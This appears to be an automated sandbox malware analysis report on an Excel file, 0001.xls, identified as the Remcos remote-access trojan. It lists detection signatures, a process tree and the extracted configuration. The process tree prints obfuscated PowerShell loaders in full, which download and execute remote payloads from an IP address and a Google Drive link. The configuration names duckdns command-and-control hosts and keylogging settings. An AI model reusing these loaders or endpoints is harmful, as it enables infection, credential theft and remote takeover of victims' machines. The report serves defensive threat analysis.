Edit tour
Windows
Analysis Report
0001.xls
Overview
General Information
| Sample name: | 0001.xls |
| Analysis ID: | 1544692 |
| MD5: | fb16f7b0fbcb2ae5d3b185392e4543a5 |
| SHA1: | f5e0e6247b2fd7ec74fc687ba0f63d8c05cc3fe0 |
| SHA256: | 8f4cb3b0aaf0bdbbcc6d080385fab14ae0cf71d8e46770902ade7f5e4099b5da |
| Tags: | xlsuser-Racco42 |
| Infos: |   |
 | |
Detection
Remcos
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs a global keyboard hook
Installs new ROOT certificates
Machine Learning detection for sample
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Obfuscated command line found
PowerShell case anomaly found
Searches for Windows Mail specific files
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w7x64
EXCEL.EXE (PID: 3560 cmdline: "C:\Progra m Files\Mi crosoft Of fice\Offic e14\EXCEL. EXE" /auto mation -Em bedding MD5: D53B85E21886D2AF9815C377537BCAC3) 
mshta.exe (PID: 3824 cmdline: C:\Windows \System32\ mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5) 
powershell.exe (PID: 3932 cmdline: "C:\Window s\SYsTEm32 \wInDoWspo WERShell\V 1.0\POWeRS heLL.eXE" "poWERSHel L.exe -EX by PAss - NOp -w 1 -C DE VicEcREdeN TiaLDEpLoy MENt.Exe ; i ex($(IEx(' [syStem.Te XT.eNcOdIn G]'+[chAR] 58+[chAr]5 8+'UtF8.Ge tstRiNg([s YstEm.conV Ert]'+[cHA R]58+[ChAr ]58+'FrOMb ASE64stRIn G('+[CHAR] 34+'JFRYOH MgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC A9ICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgYURELVR5 UGUgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAtbWVtYm VSRGVGSU5p VGlvTiAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICdbRG xsSW1wb3J0 KCJVckxtb0 4iLCAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgIENoYXJT ZXQgPSBDaG FyU2V0LlVu aWNvZGUpXX B1YmxpYyBz dGF0aWMgZX h0ZXJuIElu dFB0ciBVUk xEb3dubG9h ZFRvRmlsZS hJbnRQdHIg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICBo TXR3U0FMLH N0cmluZyAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgIGlX RlFYWCxzdH JpbmcgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICBsV05u V1BtU3Vacy x1aW50ICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgSURN ekQsSW50UH RyICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgR0NERFpy TkJNeXUpOy cgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AtTmFNRSAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICJh dUdtbnpkWi IgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AtbmFtRVNQ YWNFICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgS3NJQ3 lpZlhzeEkg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAt UGFzc1Rocn U7ICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgJFRYOHM6 OlVSTERvd2 5sb2FkVG9G aWxlKDAsIm h0dHA6Ly8x OTIuMy4xMD EuMjEvNDEy L3NlZXRoZW Jlc3R0aGlu Z3NnaXZpbm dyZW5lcmd5 dG9teWVudG lyZWxpZmVm b3JnZXRoZX JiYWNrLnRJ RiIsIiRFTn Y6QVBQREFU QVxzZWV0aG ViZXN0dGhp bmdzZ2l2aW 5ncmVuZXJn eXRvbXllbn RpcmVsaWZl Zm9yZ2V0aC 5WQnMiLDAs MCk7U3RBUn Qtc2xlZXAo Myk7c3RBUl QgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AiJGVuVjpB UFBEQVRBXH NlZXRoZWJl c3R0aGluZ3 NnaXZpbmdy ZW5lcmd5dG 9teWVudGly ZWxpZmVmb3 JnZXRoLlZC cyI='+[cHA r]0x22+')) ')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D) - powershell.exe (PID: 4028 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -EX byPAss -NOp -w 1 -C DEVicE cREdeNTiaL DEpLoyMENt .Exe MD5: A575A7610E5F003CC36DF39E07C4BA7D) 
csc.exe (PID: 3148 cmdline: "C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\htcuym da\htcuymd a.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1) - cvtres.exe (PID: 3164 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RES7781.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\htc uymda\CSCE D218374D57 64718ADCDD 459E0E116E B.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) 
AcroRd32.exe (PID: 2960 cmdline: "C:\Progra m Files (x 86)\Adobe\ Acrobat Re ader DC\Re ader\AcroR d32.exe" - Embedding MD5: 2F8D93826B8CBF9290BC57535C7A6817) - mshta.exe (PID: 3052 cmdline:
C:\Windows \System32\ mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5) - powershell.exe (PID: 808 cmdline:
"C:\Window s\SYsTEm32 \wInDoWspo WERShell\V 1.0\POWeRS heLL.eXE" "poWERSHel L.exe -EX by PAss - NOp -w 1 -C DE VicEcREdeN TiaLDEpLoy MENt.Exe ; i ex($(IEx(' [syStem.Te XT.eNcOdIn G]'+[chAR] 58+[chAr]5 8+'UtF8.Ge tstRiNg([s YstEm.conV Ert]'+[cHA R]58+[ChAr ]58+'FrOMb ASE64stRIn G('+[CHAR] 34+'JFRYOH MgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC A9ICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgYURELVR5 UGUgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAtbWVtYm VSRGVGSU5p VGlvTiAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICdbRG xsSW1wb3J0 KCJVckxtb0 4iLCAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgIENoYXJT ZXQgPSBDaG FyU2V0LlVu aWNvZGUpXX B1YmxpYyBz dGF0aWMgZX h0ZXJuIElu dFB0ciBVUk xEb3dubG9h ZFRvRmlsZS hJbnRQdHIg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICBo TXR3U0FMLH N0cmluZyAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgIGlX RlFYWCxzdH JpbmcgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICBsV05u V1BtU3Vacy x1aW50ICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgSURN ekQsSW50UH RyICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgR0NERFpy TkJNeXUpOy cgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AtTmFNRSAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICJh dUdtbnpkWi IgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AtbmFtRVNQ YWNFICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgS3NJQ3 lpZlhzeEkg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAt UGFzc1Rocn U7ICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgJFRYOHM6 OlVSTERvd2 5sb2FkVG9G aWxlKDAsIm h0dHA6Ly8x OTIuMy4xMD EuMjEvNDEy L3NlZXRoZW Jlc3R0aGlu Z3NnaXZpbm dyZW5lcmd5 dG9teWVudG lyZWxpZmVm b3JnZXRoZX JiYWNrLnRJ RiIsIiRFTn Y6QVBQREFU QVxzZWV0aG ViZXN0dGhp bmdzZ2l2aW 5ncmVuZXJn eXRvbXllbn RpcmVsaWZl Zm9yZ2V0aC 5WQnMiLDAs MCk7U3RBUn Qtc2xlZXAo Myk7c3RBUl QgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AiJGVuVjpB UFBEQVRBXH NlZXRoZWJl c3R0aGluZ3 NnaXZpbmdy ZW5lcmd5dG 9teWVudGly ZWxpZmVmb3 JnZXRoLlZC cyI='+[cHA r]0x22+')) ')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D) - powershell.exe (PID: 1568 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -EX byPAss -NOp -w 1 -C DEVicE cREdeNTiaL DEpLoyMENt .Exe MD5: A575A7610E5F003CC36DF39E07C4BA7D) - csc.exe (PID: 3612 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\1vm3e1 kt\1vm3e1k t.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1) - cvtres.exe (PID: 3624 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RESC6F7.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\1vm 3e1kt\CSC4 B568FC3E3A 64456AB566 4CB529ACC2 C.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) 
wscript.exe (PID: 3876 cmdline: "C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\seeth ebestthing sgivingren ergytomyen tirelifefo rgeth.VBs" MD5: 045451FA238A75305CC26AC982472367) - powershell.exe (PID: 3856 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' JigoR2VULV ZBUmlhQmxF ICcqbURSKi cpLk5BTUVb MywxMSwyXS 1KT0luJycp KCAoKCc3Jy snVk1pbWFn ZVVybCA9IH ptd2h0dHBz Oi8vZHJpdm UuJysnZ29v Z2xlLmNvbS 91Yz9leHBv cnQ9ZG93bm xvYWQmaWQ9 MUFJVmdKSk p2MUY2dlM0 c1VPeWJuSC 1zRHZVaEJZ d3VyIHptdz s3Vk13ZWJD bGknKydlbn QgPSBOZXct T2JqZWN0Jy snIFN5c3Rl bS5OZXQuV2 ViQ2xpZW50 OzdWTWknKy dtYWdlQnl0 ZXMgPSA3Vk 13ZWJDbGll bnQuRG93bm xvYWREYXRh KDdWTWltYW dlVXJsKTs3 Vk1pbWFnZV RleHQgPSAn KydbU3lzdG VtLlRleHQu RW5jb2Rpbm ddOjpVVCcr J0YnKyc4Lk dldFN0cmlu Zyg3Vk1pbW FnZUJ5dGVz KTs3Vk1zdG FydEZsYWcg PSB6bXc8PE JBUycrJ0U2 NF9TVEFSVD 4+em13OzdW TWVuZEZsYW cgPSB6bXc8 PEJBU0U2Jy snNF9FTkQ+ Pnptdzs3Vk 1zdGFydElu JysnZGV4ID 0gNycrJ1ZN aW1hZ2VUZX h0LkluZGV4 T2YoN1ZNc3 RhcnRGbGFn KTs3Vk1lbm RJbmRleCA9 IDdWTWltYW cnKydlVGV4 dC5JbmRleE 9mKDdWTWVu ZEZsYWcpOz dWTXN0Jysn YXJ0SW5kZX ggLScrJ2dl IDAgLWFuZC A3Vk1lbmRJ bmQnKydleC AtZ3QgN1ZN c3RhcnRJbm RleCcrJzs3 Vk1zdGFydE luZGV4ICs9 IDdWTXN0YX J0RmxhZy5M ZW5ndGg7N1 ZNJysnYmFz ZTY0TGVuZ3 RoID0gJysn NycrJ1ZNZW 5kSW5kZXgg LSA3VicrJ0 1zdGEnKydy dEluZGV4Oz dWTWJhc2U2 NENvbW1hbm QgPSA3Vk1p bWFnZVRleH QuU3ViJysn c3RyaW5nKD dWTXN0YXJ0 SW5kZXgsID dWTWJhc2U2 NExlbmd0aC k7N1ZNJysn YmFzZTY0Um V2ZXJzZWQg PSAtam9pbi AoN1YnKydN YicrJ2FzZT Y0Q29tbWFu ZC5Ub0NoYX JBcnJheSgp IHJwOCBGb3 JFYWNoLU9i amVjdCB7ID dWTV8gfSlb LTEuLi0oN1 ZNYmEnKydz ZTY0Q29tbW FuZC5MZW5n dGgpXTs3Vk 1jb21tYW5k Qnl0ZXMgPS BbU3lzdGVt LkNvbnZlcn RdOjpGcm8n KydtQmFzZT Y0U3RyaW5n KDdWTWJhc2 U2NFJldmVy cycrJ2VkKT s3Vk0nKyds b2FkZWRBc3 NlbWJseSA9 IFtTeXN0ZW 0uUmVmbGVj dGlvbi5Bc3 NlbWJseV06 OkxvYWQoN1 ZNY29tbWFu ZEJ5dGVzKT s3Vk12YWlN ZXRob2QgPS BbZG5saWIu SU8uSG9tZV 0uR2V0TWV0 aG9kKHptd1 ZBSXptdyk7 N1ZNdmFpTW V0aG9kLklu dm9rZSg3Vk 1udWxsLCAn KydAKHptd3 R4dC5UVFIn KydDTUxMLz IxNC8xMi4x JysnMDEuMy 4yOTEvLzpw dHRoem13LC B6bXdkZXNh dGl2YWRvem 13LCB6bXdk ZXNhdGl2YS crJ2Rvem13 LCB6bXdkZX NhdGl2YWRv em13LCB6bX dDYXNQb2x6 bXcsIHptd2 Rlc2F0aXZh ZCcrJ296bX csIHptd2Rl c2F0aXZhZG 96bXcsem13 ZGVzYXRpdm Fkb3ptdyx6 bXdkZXNhdG l2YWRvem13 LHptd2Rlc2 F0aXYnKydh ZG96bXcsem 13ZGVzYXRp dmFkb3ptdy x6bXdkZXNh dGl2JysnYW RveicrJ213 LHptdzF6bX csem13ZGVz YXRpdmFkb3 ptdykpOycp ICAtckVQbE FDZSAncnA4 JyxbQ0hhcl 0xMjQgIC1j cmVQbGFDRS AgKFtDSGFy XTEyMitbQ0 hhcl0xMDkr W0NIYXJdMT E5KSxbQ0hh cl0zOS1jcm VQbGFDRShb Q0hhcl01NS tbQ0hhcl04 NitbQ0hhcl 03NyksW0NI YXJdMzYpKQ ==';$OWjux d = [syste m.Text.enc oding]::UT F8.GetStri ng([system .Convert]: :Frombase6 4String($c odigo));po wershell.e xe -window style hidd en -execut ionpolicy bypass -No Profile -c ommand $OW juxD MD5: A575A7610E5F003CC36DF39E07C4BA7D) - powershell.exe (PID: 3776 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "&((Ge T-VARiaBlE '*mDR*'). NAME[3,11, 2]-JOIn'') ( (('7'+'V MimageUrl = zmwhttps ://drive.' +'google.c om/uc?expo rt=downloa d&id=1AIVg JJJv1F6vS4 sUOybnH-sD vUhBYwur z mw;7VMwebC li'+'ent = New-Objec t'+' Syste m.Net.WebC lient;7VMi '+'mageByt es = 7VMwe bClient.Do wnloadData (7VMimageU rl);7VMima geText = ' +'[System. Text.Encod ing]::UT'+ 'F'+'8.Get String(7VM imageBytes );7VMstart Flag = zmw <<BAS'+'E6 4_START>>z mw;7VMendF lag = zmw< <BASE6'+'4 _END>>zmw; 7VMstartIn '+'dex = 7 '+'VMimage Text.Index Of(7VMstar tFlag);7VM endIndex = 7VMimag'+ 'eText.Ind exOf(7VMen dFlag);7VM st'+'artIn dex -'+'ge 0 -and 7V MendInd'+' ex -gt 7VM startIndex '+';7VMsta rtIndex += 7VMstartF lag.Length ;7VM'+'bas e64Length = '+'7'+'V MendIndex - 7V'+'Mst a'+'rtInde x;7VMbase6 4Command = 7VMimageT ext.Sub'+' string(7VM startIndex , 7VMbase6 4Length);7 VM'+'base6 4Reversed = -join (7 V'+'Mb'+'a se64Comman d.ToCharAr ray() rp8 ForEach-Ob ject { 7VM _ })[-1..- (7VMba'+'s e64Command .Length)]; 7VMcommand Bytes = [S ystem.Conv ert]::Fro' +'mBase64S tring(7VMb ase64Rever s'+'ed);7V M'+'loaded Assembly = [System.R eflection. Assembly]: :Load(7VMc ommandByte s);7VMvaiM ethod = [d nlib.IO.Ho me].GetMet hod(zmwVAI zmw);7VMva iMethod.In voke(7VMnu ll, '+'@(z mwtxt.TTR' +'CMLL/214 /12.1'+'01 .3.291//:p tthzmw, zm wdesativad ozmw, zmwd esativa'+' dozmw, zmw desativado zmw, zmwCa sPolzmw, z mwdesativa d'+'ozmw, zmwdesativ adozmw,zmw desativado zmw,zmwdes ativadozmw ,zmwdesati v'+'adozmw ,zmwdesati vadozmw,zm wdesativ'+ 'adoz'+'mw ,zmw1zmw,z mwdesativa dozmw));') -rEPlACe 'rp8',[CHa r]124 -cre PlaCE ([CH ar]122+[CH ar]109+[CH ar]119),[C Har]39-cre PlaCE([CHa r]55+[CHar ]86+[CHar] 77),[CHar] 36))" MD5: A575A7610E5F003CC36DF39E07C4BA7D) - CasPol.exe (PID: 3280 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Cas Pol.exe" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61) - CasPol.exe (PID: 3180 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\CasP ol.exe /st ext "C:\Us ers\user\A ppData\Loc al\Temp\mp qqyenbumlf hmiakqc" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61) - CasPol.exe (PID: 3232 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\CasP ol.exe /st ext "C:\Us ers\user\A ppData\Loc al\Temp\wj wiyxyvivds jteetbolyx d" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61) - CasPol.exe (PID: 3212 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\CasP ol.exe /st ext "C:\Us ers\user\A ppData\Loc al\Temp\hl jbzpjxwdvx tzshkmjmbb yzqg" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity. |
{"Host:Port:Password": ["cokka.duckdns.org:9764:1", "cokka.duckdns.org:9674:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-TTZ00A", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
| JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
| JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
| Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| |
| REMCOS_RAT_variants | unknown | unknown |
| |
| Click to see the 14 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
| JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
| JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
| Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| |
| REMCOS_RAT_variants | unknown | unknown |
| |
| Click to see the 7 entries | ||||
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||